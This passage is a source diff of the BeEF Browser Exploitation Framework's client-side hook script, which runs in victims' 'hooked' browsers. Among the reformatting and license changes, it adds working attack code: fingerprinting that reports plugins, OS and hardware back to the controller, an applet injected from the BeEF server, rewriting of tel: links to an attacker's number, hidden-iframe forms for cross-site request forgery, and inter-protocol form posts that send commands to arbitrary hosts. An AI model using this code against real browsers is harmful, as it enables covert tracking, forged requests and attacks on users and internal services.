+		if (this.isC20())	{ return '20' };	// Chrome 20
+		if (this.isC21())	{ return '21' };	// Chrome 21
+		if (this.isC22())   { return '22' };    // Chrome 22

 		if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3
@@ -431,20 +552,28 @@ beef.browser = {
 		if (this.isFF8())	{ return '8'  };	// Firefox 8
 		if (this.isFF9())	{ return '9'  };	// Firefox 9
 		if (this.isFF10())	{ return '10' };	// Firefox 10
-
+		if (this.isFF11())	{ return '11' };	// Firefox 11
+		if (this.isFF12())	{ return '12' };	// Firefox 12
+		if (this.isFF13())	{ return '13' };	// Firefox 13
+		if (this.isFF14())	{ return '14' };	// Firefox 14
+		if (this.isFF15())	{ return '15' };	// Firefox 15
+		if (this.isFF16())	{ return '16' };	// Firefox 16

 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
 		if (this.isIE8())	{ return '8'  };	// Internet Explorer 8
 		if (this.isIE9())	{ return '9'  };	// Internet Explorer 9
+		if (this.isIE10())	{ return '10' };	// Internet Explorer 10

 		if (this.isS4())	{ return '4'  };	// Safari 4
 		if (this.isS5())	{ return '5'  };	// Safari 5
+		if (this.isS6())	{ return '6'  };	// Safari 5

 		if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
 		if (this.isO9_60())	{ return '9.6'};	// Opera 9.6
 		if (this.isO10())	{ return '10' };	// Opera 10.xx
 		if (this.isO11())	{ return '11' };	// Opera 11.xx
+		if (this.isO12())	{ return '12' };	// Opera 12.xx

 		return 'UNKNOWN';				// Unknown UA
 	},
@@ -492,7 +621,47 @@ beef.browser = {
 			return flash_installed;
 		}
 	},
+
+	/**
+	 * Checks if the zombie has Java enabled.
+ 	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if(beef.browser.javaEnabled()) { ... }
+	 */
+	javaEnabled: function() {
+
+		return (!!window.navigator.javaEnabled());
 	
+	},
+
+	/**
+	 * Checks if the Phonegap API is available from the hooked domain.
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if(beef.browser.hasPhonegap()) { ... }
+	 */
+	hasPhonegap: function() {
+		var result = false;
+		try { if (!!device.phonegap) result = true; else result = false; }
+		catch(e) { result = false; }
+		return result;
+	},
+
+	/**
+	 * Checks if the browser supports CORS
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if(beef.browser.hasCors()) { ... }
+	 */
+	hasCors: function() {
+		if ('withCredentials' in new XMLHttpRequest())
+			return true;	
+		else if (typeof XDomainRequest !== "undefined")
+			return true;
+		else
+			return false;
+	},
+
 	/**
 	 * Checks if the zombie has Java installed and enabled.
 	 * @return: {Boolean} true or false.
@@ -500,9 +669,34 @@ beef.browser = {
 	 * @example: if(beef.browser.hasJava()) { ... }
 	 */
 	hasJava: function() {
-		if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) {
+
+		// Check if Java is enabled
+		if (!beef.browser.javaEnabled()) {
+			return false;
+		}
+
+		// This is a temporary fix as this does not work on Safari and Chrome
+		// Chrome requires manual user intervention even with unsigned applets.
+		// Safari requires a few seconds to load the applet.
+		if (beef.browser.isC() || beef.browser.isS()) {
 			return true;
 		}
+
+		// Inject an unsigned java applet to double check if the Java
+		// plugin is working fine.
+		try {
+			var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
+   				var applet_id = 'checkJava';
+   				var applet_name = 'checkJava';
+   				var output;
+   				beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
+  				null, applet_archive, null);
+   				output = document.Microsoft_Corporation.getInfo();
+			beef.dom.detachApplet('checkJava');
+			return output = 1;
+		} catch(e) {
+			return false;
+		}
 		return false;
 	},
 	
@@ -524,29 +718,37 @@ beef.browser = {
 	 * Returns the list of plugins installed in the browser.
 	 */
 	getPlugins: function() {
-		var results = '';
-        if (this.isIE())
-        {
-            results = this.getPluginsIE();
-        } else {
-            if (navigator.plugins && navigator.plugins.length > 0)
-            {
-                var length = navigator.plugins.length;
-                for (var i=0; i < length; i++)
-                {
-                    if (i != 0)
-                        results += '\n';
-                    if(beef.browser.isFF()){ //FF returns exact plugin versions
-                        results += navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
-                    }else{ // Webkit and Presto (Opera) doesn't support the version attribute, and
-                           // sometimes they store plugin version in description (Real, Adobe)
-                        results += navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
-                    }
-                }
-            } else {
-                results = 'navigator.plugins is not supported in this browser!';
-            }
-        }
+
+		var results;
+		Array.prototype.unique = function() {
+			var o = {}, i, l = this.length, r = [];
+			for(i=0; i<l;i+=1) o[this[i]] = this[i];
+			for(i in o) r.push(o[i]);
+			return r;
+		};
+
+		// Internet Explorer
+		if (this.isIE()) this.getPluginsIE();
+
+		// All other browsers that support navigator.plugins
+		else if (navigator.plugins && navigator.plugins.length > 0) {
+			results = new Array();
+			for (var i=0; i < navigator.plugins.length; i++) {
+
+				// Firefox returns exact plugin versions
+				if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
+
+				// Webkit and Presto (Opera)
+				// Don't support the version attribute
+				// Sometimes store the version in description (Real, Adobe)
+				else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
+			}
+			results = results.unique().toString();
+
+		// All browsers that don't support navigator.plugins
+		} else results = 'navigator.plugins is not supported in this browser!';
+
+		// Return results
 		return results;
 	},
 	
@@ -623,7 +825,7 @@ beef.browser = {
 	/**
 	 * Returns zombie screen size and color depth.
 	 */	
-	getScreenParams: function() {
+	getScreenSize: function() {
 		return {
 			width: window.screen.width, 
 			height: window.screen.height,
@@ -672,16 +874,17 @@ beef.browser = {
 		var hostname = document.location.hostname;
 		var hostport = (document.location.port)? document.location.port : "80";
 		var browser_plugins = beef.browser.getPlugins();
+		var date_stamp = new Date().toString();
 		var os_name = beef.os.getName();
+		var hw_name = beef.hardware.getName();
 		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
-		var internal_ip = beef.net.local.getLocalAddress();
-		var internal_hostname = beef.net.local.getLocalHostname();
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
-		var screen_params = beef.browser.getScreenParams();
+		var screen_size = beef.browser.getScreenSize();
 		var window_size = beef.browser.getWindowSize();
-		var java_enabled = (beef.browser.hasJava())? "Yes" : "No";
+		var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
 		var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
 		var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
+		var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
 		var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
 		var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
 		var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -699,15 +902,16 @@ beef.browser = {
 		if(hostport) details["HostPort"] = hostport;
 		if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
 		if(os_name) details['OsName'] = os_name;
+		if(hw_name) details['Hardware'] = hw_name;
+		if(date_stamp) details['DateStamp'] = date_stamp;
 		if(system_platform) details['SystemPlatform'] = system_platform;
-		if(internal_ip) details['InternalIP'] = internal_ip;
-		if(internal_hostname) details['InternalHostname'] = internal_hostname;
 		if(browser_type) details['BrowserType'] = browser_type;
-		if(screen_params) details['ScreenParams'] = screen_params;
+		if(screen_size) details['ScreenSize'] = screen_size;
 		if(window_size) details['WindowSize'] = window_size;
-		if(java_enabled) details['JavaEnabled'] = java_enabled
+		if(java_enabled) details['JavaEnabled'] = java_enabled;
 		if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
 		if(has_flash) details['HasFlash'] = has_flash
+		if(has_phonegap) details['HasPhonegap'] = has_phonegap
 		if(has_web_socket) details['HasWebSocket'] = has_web_socket
 		if(has_googlegears) details['HasGoogleGears'] = has_googlegears
 		if(has_activex) details['HasActiveX'] = has_activex;
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,110 +1,101 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.cookie
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
- * Original author unknown.
- * 
- */
-beef.browser.cookie = {
-	
-		setCookie: function (name, value, expires, path, domain, secure) 
-		{
-	
-			var today = new Date();
-			today.setTime( today.getTime() );
-	
-			if ( expires )
-			{
-				expires = expires * 1000 * 60 * 60 * 24;
-			}
-			var expires_date = new Date( today.getTime() + (expires) );
-	
-			document.cookie = name + "=" +escape( value ) +
-				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
-				( ( path ) ? ";path=" + path : "" ) +
-				( ( domain ) ? ";domain=" + domain : "" ) +
-				( ( secure ) ? ";secure" : "" );
-		},
-
-		getCookie: function(name) 
-		{
-			var a_all_cookies = document.cookie.split( ';' );
-			var a_temp_cookie = '';
-			var cookie_name = '';
-			var cookie_value = '';
-			var b_cookie_found = false;
-			
-			for ( i = 0; i < a_all_cookies.length; i++ )
-			{
-				a_temp_cookie = a_all_cookies[i].split( '=' );
-				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
-				if ( cookie_name == name )
-				{
-					b_cookie_found = true;
-					if ( a_temp_cookie.length > 1 )
-					{
-						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
-					}
-					return cookie_value;
-					break;
-				}
-				a_temp_cookie = null;
-				cookie_name = '';
-			}
-			if ( !b_cookie_found )
-			{
-				return null;
-			}
-		},
-
-		deleteCookie: function (name, path, domain) 
-		{
-			if ( this.getCookie(name) ) document.cookie = name + "=" +
-			( ( path ) ? ";path=" + path : "") +
-			( ( domain ) ? ";domain=" + domain : "" ) +
-			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
-		},
-		
-		hasSessionCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', '', '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		},
-
-		hasPersistentCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', 1, '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		}	
-					
-};
-
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.cookie
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
+ * Original author unknown.
+ * 
+ */
+beef.browser.cookie = {
+	
+		setCookie: function (name, value, expires, path, domain, secure) 
+		{
+	
+			var today = new Date();
+			today.setTime( today.getTime() );
+	
+			if ( expires )
+			{
+				expires = expires * 1000 * 60 * 60 * 24;
+			}
+			var expires_date = new Date( today.getTime() + (expires) );
+	
+			document.cookie = name + "=" +escape( value ) +
+				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
+				( ( path ) ? ";path=" + path : "" ) +
+				( ( domain ) ? ";domain=" + domain : "" ) +
+				( ( secure ) ? ";secure" : "" );
+		},
+
+		getCookie: function(name) 
+		{
+			var a_all_cookies = document.cookie.split( ';' );
+			var a_temp_cookie = '';
+			var cookie_name = '';
+			var cookie_value = '';
+			var b_cookie_found = false;
+			
+			for ( i = 0; i < a_all_cookies.length; i++ )
+			{
+				a_temp_cookie = a_all_cookies[i].split( '=' );
+				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
+				if ( cookie_name == name )
+				{
+					b_cookie_found = true;
+					if ( a_temp_cookie.length > 1 )
+					{
+						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
+					}
+					return cookie_value;
+					break;
+				}
+				a_temp_cookie = null;
+				cookie_name = '';
+			}
+			if ( !b_cookie_found )
+			{
+				return null;
+			}
+		},
+
+		deleteCookie: function (name, path, domain) 
+		{
+			if ( this.getCookie(name) ) document.cookie = name + "=" +
+			( ( path ) ? ";path=" + path : "") +
+			( ( domain ) ? ";domain=" + domain : "" ) +
+			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
+		},
+		
+		hasSessionCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', '', '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		},
+
+		hasPersistentCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', 1, '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		}	
+					
+};
+
 beef.regCmp('beef.browser.cookie');
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,39 +1,30 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.popup
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://davidwalsh.name/popup-block-javascript
- * Original author unknown.
- * 
- */
-beef.browser.popup = {
-	
-		blocker_enbabled: function ()
-		{
-			screenParams = beef.browser.getScreenParams();
-			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
-			if (popUp == null || typeof(popUp)=='undefined') {   
-			  	return true;
-			} else {   
-				popUp.close();
-				return false;
-			}
-		}
-};
-
-beef.regCmp('beef.browser.popup');
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.popup
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://davidwalsh.name/popup-block-javascript
+ * Original author unknown.
+ * 
+ */
+beef.browser.popup = {
+	
+		blocker_enabled: function ()
+		{
+			screenParams = beef.browser.getScreenSize();
+			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
+			if (popUp == null || typeof(popUp)=='undefined') {   
+			  	return true;
+			} else {   
+				popUp.close();
+				return false;
+			}
+		}
+};
+
+beef.regCmp('beef.browser.popup');
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.dom
 *
@@ -194,6 +185,31 @@ beef.dom = {
 		return count;
 	},

+	/**
+	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
+	 * @param: {String} new_number: the new link telephone number to be written
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteTelLinks: function(new_number, selector) {
+
+		var count = 0;
+		var re = new RegExp("tel:/?/?.*", "gi");
+		var sel = (selector == null) ? 'a' : selector;
+
+		$j(sel).each(function() {
+			if ($j(this).attr('href') != null) {
+				var url = $j(this).attr('href');
+				if (url.match(re)) {
+					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
+					count++;
+				}
+			}
+		});
+
+		return count;
+	},
+
    /**
     *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
     * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -286,10 +302,61 @@ beef.dom = {
     */
    detachApplet: function(id) {
        $j('#' + id + '').detach();
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
+     * @params: {String} action: the form action attribute, where the request will be sent.
+     * @params: {String} method: HTTP method, usually POST.
+     * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
+     *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
+     */
+    createIframeXsrfForm: function(action, method, inputs){
+        var iframeXsrf = beef.dom.createInvisibleIframe();
+
+        var formXsrf = document.createElement('form');
+        formXsrf.setAttribute('action', action);
+        formXsrf.setAttribute('method', method);
+
+        var input = null;
+        for (i in inputs){
+            var attributes = inputs[i];
+            input = document.createElement('input');
+                for(key in attributes){
+                    input.setAttribute(key, attributes[key]);
+                }
+            formXsrf.appendChild(input);
+        }
+        iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
+        formXsrf.submit();
+
+        return iframeXsrf;
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+     * @params: {String} rhost: remote host ip/domain
+     * @params: {String} rport: remote port
+     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     */
+    createIframeIpecForm: function(rhost, rport, commands){
+        var iframeIpec = beef.dom.createInvisibleIframe();
+
+        var formIpec = document.createElement('form');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('method',  'POST');
+        formIpec.setAttribute('enctype', 'multipart/form-data');
+
+        input = document.createElement('textarea');
+        input.setAttribute('name', Math.random().toString(36).substring(5));
+        input.value = commands;
+        formIpec.appendChild(input);
+        iframeIpec.contentWindow.document.body.appendChild(formIpec);
+        formIpec.submit();
+
+        return iframeIpec;
    }

-
-	
 };

 beef.regCmp('beef.dom');
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662

 beef.encode = {};
@@ -156,6 +147,6 @@ beef.encode.base64 = {
        return string;
    }

-}
+};

 beef.regCmp('beef.encode.base64');
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,26 +1,23 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/

 beef.encode.json = {
 	
 	stringify: function(o) {
-        if (typeof(JSON) == 'object' && JSON.stringify)
-            return JSON.stringify(o);
-        
+        if (typeof(JSON) == 'object' && JSON.stringify) {
+            // Error on stringifying cylcic structures caused polling to die
+            try {
+                s = JSON.stringify(o);    
+            } catch(error) {
+                // TODO log error / handle cyclic structures? 
+            }
+            return s;
+        }
        var type = typeof(o);
    
        if (o === null)
@@ -126,9 +123,9 @@ beef.encode.json = {
        '"' : '\\"',
        '\\': '\\\\'
    }
-}
+};

-$j.toJSON = function(o) {return beef.encode.json.stringify(o);}
-$j.quoteString = function(o) {return beef.encode.json.quoteString(o);}
+$j.toJSON = function(o) {return beef.encode.json.stringify(o);};
+$j.quoteString = function(o) {return beef.encode.json.quoteString(o);};

 beef.regCmp('beef.encode.json');
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.geolocation
 *
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -0,0 +1,82 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.hardware = {
+
+	ua: navigator.userAgent,
+	
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+	
+	isIphone: function() {
+		return (this.ua.indexOf('iPhone') != -1) ? true : false;
+	},
+
+	isIpad: function() {
+		return (this.ua.indexOf('iPad') != -1) ? true : false;
+	},
+
+	isIpod: function() {
+		return (this.ua.indexOf('iPod') != -1) ? true : false;
+	},
+
+	isNokia: function() {
+		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+	},
+
+	isBlackBerry: function() {
+		return (this.ua.match('BlackBerry')) ? true : false;
+	},
+
+	isZune: function() {
+		return (this.ua.match('ZuneWP7')) ? true : false;
+	},
+
+	isKindle: function() {
+		return (this.ua.match('Kindle')) ? true : false;
+	},
+
+	isHtc: function() {
+		return (this.ua.match('HTC')) ? true : false;
+	},
+
+	isEricsson: function() {
+		return (this.ua.match('Ericsson')) ? true : false;
+	},
+
+	isNokia: function() {
+		return (this.ua.match('Nokia')) ? true : false;
+	},
+
+	isMotorola: function() {
+		return (this.ua.match('Motorola')) ? true : false;
+	},
+
+	isGoogle: function() {
+		return (this.ua.match('Nexus One')) ? true : false;
+	},
+
+	getName: function() {
+
+		if (this.isNokia()) return 'Nokia';
+		if (this.isWinPhone()) return 'Windows Phone';
+		if (this.isBlackBerry()) return 'BlackBerry';
+		if (this.isIphone()) return 'iPhone';
+		if (this.isIpad()) return 'iPad';
+		if (this.isIpod()) return 'iPod';
+		if (this.isKindle()) return 'Kindle';
+		if (this.isHtc()) return 'HTC';
+		if (this.isMotorola()) return 'Motorola';
+		if (this.isZune()) return 'Zune';
+		if (this.isGoogle()) return 'Google';
+		if (this.isEricsson()) return 'Ericsson';
+
+		return 'Unknown';
+	}
+};
+
+beef.regCmp('beef.net.hardware');
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,69 +1,72 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
- 
+
+
 // if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
 // and will have a new session id. The new session id will need to know
 // the brwoser details. So sendback the browser details again.

-BEEFHOOK=beef.session.get_hook_session_id()
+BEEFHOOK = beef.session.get_hook_session_id();

-if( beef.pageIsLoaded ) {
-  beef.net.browser_details();	
+if (beef.pageIsLoaded) {
+    beef.net.browser_details();
 }

-window.onload = function() {
-	beef_init();
-}
+window.onload = function () {
+    beef_init();
+};

-window.onpopstate = function(event) {
-	if(beef.onpopstate.length > 0) {
-			event.preventDefault;
-			for(var i=0;i<beef.onpopstate.length;i++){
-				var callback = beef.onpopstate[i];
-				try{
-					callback(event);
-				}catch(e){
-					console.log("window.onpopstate - couldn't execute callback: " + e.message);
-				}
-			return false;
-		}
-	}
-}
+window.onpopstate = function (event) {
+    if (beef.onpopstate.length > 0) {
+        event.preventDefault;
+        for (var i = 0; i < beef.onpopstate.length; i++) {
+            var callback = beef.onpopstate[i];
+            try {
+                callback(event);
+            } catch (e) {
+                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+            }
+            return false;
+        }
+    }
+};

-window.onclose = function(event) {
-	if(beef.onclose.length > 0) {
-			event.preventDefault;
-			for(var i=0;i<beef.onclose.length;i++){
-				var callback = beef.onclose[i];
-				try{
-					callback(event);
-				}catch(e){
-					console.log("window.onclose - couldn't execute callback: " + e.message);
-				}
-			return false;
-		}
-	}
-}
+window.onclose = function (event) {
+    if (beef.onclose.length > 0) {
+        event.preventDefault;
+        for (var i = 0; i < beef.onclose.length; i++) {
+            var callback = beef.onclose[i];
+            try {
+                callback(event);
+            } catch (e) {
+                console.log("window.onclose - couldn't execute callback: " + e.message);
+            }
+            return false;
+        }
+    }
+};

 function beef_init() {
-  if (!beef.pageIsLoaded) {
-    beef.pageIsLoaded = true;
-	beef.net.browser_details()
-    beef.updater.execute_commands();
-    beef.updater.check();
-    beef.logger.start();
-  }
+    if (!beef.pageIsLoaded) {
+        beef.pageIsLoaded = true;
+        if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
+            beef.websocket.start();
+            beef.net.browser_details();
+            beef.updater.execute_commands();
+            beef.logger.start();
+            beef.are.init();
+
+        }
+        else {
+            beef.net.browser_details();
+            beef.updater.execute_commands();
+            beef.updater.check();
+            beef.logger.start();
+            beef.are.init();
+        }
+
+    }
 }
--- a/core/main/client/lib/browser_jools.js
+++ b/core/main/client/lib/browser_jools.js
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
 * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
 *
@@ -158,14 +149,14 @@ this.get = function(name, cb, dont_reset)
 	$(document).ready(function() {
 		self._evercookie(name, cb, undefined, undefined, dont_reset);
 	});
-}
+};

 this.set = function(name, value)
 {
 	$(document).ready(function() {
 			self._evercookie(name, function() { }, value);
 	});
-}
+};

 this._evercookie = function(name, cb, value, i, dont_reset)
 {
@@ -273,7 +264,7 @@ this._evercookie = function(name, cb, value, i, dont_reset)
 				cb(candidate, tmpec);
 		}
 	}
-}
+};

 this.evercookie_window = function(name, value)
 {
@@ -283,7 +274,7 @@ this.evercookie_window = function(name, value)
 		else
